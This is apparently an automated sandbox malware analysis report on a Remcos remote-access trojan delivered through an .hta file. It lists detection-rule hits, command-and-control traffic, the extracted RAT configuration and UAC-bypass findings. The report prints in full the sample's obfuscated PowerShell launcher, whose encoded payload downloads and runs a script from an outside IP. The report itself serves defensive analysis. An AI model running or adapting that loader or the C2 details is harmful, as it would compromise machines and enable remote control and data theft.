Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))", CommandLine: PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTs

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1488, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.cmdline", ProcessId: 6080, ProcessName: csc.exe

Stealing of Sensitive Information

Sigma detected: Remcos

Source: Registry Key set

Author: Joe Security: Data: Details: 18 D2 20 8F 72 BB 7F AA 92 CC 13 EA 0B 58 F9 C8 7C F6 59 6F 27 61 0F B1 A6 00 B9 F3 65 FD 9A F2 40 2B 5B 4F 9B 68 69 B6 12 A7 75 F4 91 E9 3E A7 F9 4D 40 93 02 0E 84 5C 32 C8 76 92 E3 AC 4B 26 7A CF E1 02 EC D6 1B 52 85 9C 80 F1 2A B1 2C 8C 3E 1F 34 A8 77 57 00 4D E8 57 F2 D9 76 75 25 EC C6 C9 F5 B8 F1 F1 80 D1 0E 05 4D 29 77 88 D7 96 3D 66 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, ProcessId: 6284, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-PVMSPM\exepath

Suricata Signatures

ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T07:38:54.029867+0100	2020425	1	Exploit Kit Activity Detected	104.21.84.67	443	192.168.2.6	49771	TCP

ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T07:38:54.029867+0100	2020424	1	Exploit Kit Activity Detected	104.21.84.67	443	192.168.2.6	49771	TCP

ET JA3 Hash - Remcos 3.x/4.x TLS Connection

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T07:38:57.484695+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	49778	107.173.143.10	14646	TCP
2024-12-13T07:39:00.557990+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	49788	107.173.143.10	14646	TCP
2024-12-13T07:39:03.635150+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	49794	107.173.143.10	14646	TCP
2024-12-13T07:39:06.714457+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	49801	107.173.143.10	14646	TCP
2024-12-13T07:39:09.795351+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	49810	107.173.143.10	14646	TCP
2024-12-13T07:39:12.870517+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	49818	107.173.143.10	14646	TCP
2024-12-13T07:39:15.949037+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	49827	107.173.143.10	14646	TCP
2024-12-13T07:39:19.026891+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	49836	107.173.143.10	14646	TCP
2024-12-13T07:39:22.129857+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	49843	107.173.143.10	14646	TCP
2024-12-13T07:39:25.217756+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	49851	107.173.143.10	14646	TCP
2024-12-13T07:39:28.292064+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	49860	107.173.143.10	14646	TCP
2024-12-13T07:39:31.369970+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	49869	107.173.143.10	14646	TCP
2024-12-13T07:39:34.452551+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	49876	107.173.143.10	14646	TCP
2024-12-13T07:39:37.526346+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	49885	107.173.143.10	14646	TCP
2024-12-13T07:39:40.604671+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	49892	107.173.143.10	14646	TCP
2024-12-13T07:39:43.699447+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	49900	107.173.143.10	14646	TCP
2024-12-13T07:39:46.780365+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	49909	107.173.143.10	14646	TCP
2024-12-13T07:39:49.855713+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	49917	107.173.143.10	14646	TCP
2024-12-13T07:39:52.952850+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	49925	107.173.143.10	14646	TCP
2024-12-13T07:39:56.046189+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	49934	107.173.143.10	14646	TCP
2024-12-13T07:39:59.468403+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	49943	107.173.143.10	14646	TCP
2024-12-13T07:40:02.593669+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	49951	107.173.143.10	14646	TCP
2024-12-13T07:40:05.693031+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	49958	107.173.143.10	14646	TCP
2024-12-13T07:40:08.796633+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	49966	107.173.143.10	14646	TCP
2024-12-13T07:40:11.872217+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	49974	107.173.143.10	14646	TCP
2024-12-13T07:40:14.964552+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	49983	107.173.143.10	14646	TCP
2024-12-13T07:40:18.199825+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	49990	107.173.143.10	14646	TCP
2024-12-13T07:40:21.277536+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	49998	107.173.143.10	14646	TCP
2024-12-13T07:40:24.355592+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50006	107.173.143.10	14646	TCP
2024-12-13T07:40:27.434885+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50015	107.173.143.10	14646	TCP
2024-12-13T07:40:30.512640+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50018	107.173.143.10	14646	TCP
2024-12-13T07:40:33.691995+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50019	107.173.143.10	14646	TCP
2024-12-13T07:40:36.765951+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50020	107.173.143.10	14646	TCP
2024-12-13T07:40:39.817468+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50021	107.173.143.10	14646	TCP
2024-12-13T07:40:42.824567+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50022	107.173.143.10	14646	TCP
2024-12-13T07:40:45.793353+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50023	107.173.143.10	14646	TCP
2024-12-13T07:40:48.750424+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50024	107.173.143.10	14646	TCP
2024-12-13T07:40:51.668613+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50025	107.173.143.10	14646	TCP
2024-12-13T07:40:54.585616+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50026	107.173.143.10	14646	TCP
2024-12-13T07:40:57.449727+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50027	107.173.143.10	14646	TCP
2024-12-13T07:41:00.590897+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50028	107.173.143.10	14646	TCP
2024-12-13T07:41:03.405549+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50029	107.173.143.10	14646	TCP
2024-12-13T07:41:06.220764+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50030	107.173.143.10	14646	TCP
2024-12-13T07:41:09.028196+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50032	107.173.143.10	14646	TCP
2024-12-13T07:41:11.763701+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50033	107.173.143.10	14646	TCP
2024-12-13T07:41:14.501227+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50034	107.173.143.10	14646	TCP
2024-12-13T07:41:17.204841+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50035	107.173.143.10	14646	TCP
2024-12-13T07:41:19.876654+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50036	107.173.143.10	14646	TCP
2024-12-13T07:41:22.528370+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50037	107.173.143.10	14646	TCP
2024-12-13T07:41:25.173375+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50038	107.173.143.10	14646	TCP
2024-12-13T07:41:27.798618+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50039	107.173.143.10	14646	TCP
2024-12-13T07:41:30.449599+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50040	107.173.143.10	14646	TCP
2024-12-13T07:41:33.032754+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50041	107.173.143.10	14646	TCP
2024-12-13T07:41:35.613608+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50042	107.173.143.10	14646	TCP
2024-12-13T07:41:38.138463+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50043	107.173.143.10	14646	TCP
2024-12-13T07:41:40.676629+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50044	107.173.143.10	14646	TCP
2024-12-13T07:41:43.185847+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50045	107.173.143.10	14646	TCP
2024-12-13T07:41:45.707695+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50046	107.173.143.10	14646	TCP
2024-12-13T07:41:48.217483+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50047	107.173.143.10	14646	TCP
2024-12-13T07:41:50.687440+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50048	107.173.143.10	14646	TCP
2024-12-13T07:41:53.138305+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50049	107.173.143.10	14646	TCP
2024-12-13T07:41:55.591617+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50050	107.173.143.10	14646	TCP
2024-12-13T07:41:58.057647+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50051	107.173.143.10	14646	TCP
2024-12-13T07:42:00.828623+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50052	107.173.143.10	14646	TCP
2024-12-13T07:42:03.248163+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50053	107.173.143.10	14646	TCP
2024-12-13T07:42:05.655495+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50054	107.173.143.10	14646	TCP
2024-12-13T07:42:08.045202+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50055	107.173.143.10	14646	TCP
2024-12-13T07:42:10.421554+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50057	107.173.143.10	14646	TCP
2024-12-13T07:42:12.828519+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50058	107.173.143.10	14646	TCP
2024-12-13T07:42:15.191736+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50059	107.173.143.10	14646	TCP
2024-12-13T07:42:17.546059+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50060	107.173.143.10	14646	TCP
2024-12-13T07:42:19.874365+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50061	107.173.143.10	14646	TCP
2024-12-13T07:42:22.311362+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50062	107.173.143.10	14646	TCP
2024-12-13T07:42:24.639244+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50063	107.173.143.10	14646	TCP

ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T07:38:36.827575+0100	2049038	1	A Network Trojan was detected	151.101.1.137	443	192.168.2.6	49715	TCP

ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T07:38:54.999503+0100	2858295	1	A Network Trojan was detected	104.21.84.67	443	192.168.2.6	49771	TCP

ETPRO MALWARE ReverseLoader Payload Request (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T07:38:26.393804+0100	2858795	1	A Network Trojan was detected	192.168.2.6	49708	192.210.150.24	80	TCP

ETPRO MALWARE Terse Request to paste .ee - Possible Download

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T07:38:53.629074+0100	2841075	1	Malware Command and Control Activity Detected	192.168.2.6	49771	104.21.84.67	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000008.00000002.2521285929.0000000009096000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Remcos {"Host:Port:Password": ["newglobalfucntioninside.duckdns.org:14646:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-PVMSPM", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Multi AV Scanner detection for submitted file

Source: creamkissingthingswithcreambananapackagecreamy.hta	Virustotal: Detection: 40%			Perma Link
Source: creamkissingthingswithcreambananapackagecreamy.hta	ReversingLabs: Detection: 23%

Yara detected Remcos RAT

Source: Yara match	File source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.90965d0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.90965d0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2521285929.0000000009096000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4561290928.0000000001068000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 6284, type: MEMORYSTR

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 12_2_0043294A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,

12_2_0043294A

Source: powershell.exe, 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_001de1c2-4

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.90965d0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.90965d0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2521285929.0000000009096000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 6284, type: MEMORYSTR

Privilege Escalation

Contains functionality to bypass UAC (CMSTPLUA)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 12_2_00406764 _wcslen,CoGetObject,

12_2_00406764

Phishing

Yara detected obfuscated html page

Source: Yara match

File source: creamkissingthingswithcreambananapackagecreamy.hta, type: SAMPLE

Source: unknown	HTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.6:49771 version: TLS 1.2

Source:	Binary string: iviwipiqdnlib.dotnet.mdrawpropertyptrrowirisdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotdnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywriterjgmicrosoft.win32.taskschedulertaskregistrationinfojfjejdjcmicrosoft.win32.taskschedulershowmessageactionjbdnlib.dotnetihasdeclsecuritycomhandlerupdatejamicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokenex`2dnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib
Source:	Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.2515686581.00000000068D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2518375278.0000000006FDA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: q:C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.pdb source: powershell.exe, 00000003.00000002.2247409766.0000000004E38000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.2515686581.00000000068D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2518375278.0000000006FDA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.2518375278.0000000006FDA000.00000004.00000800.00020000.00000000.sdmp

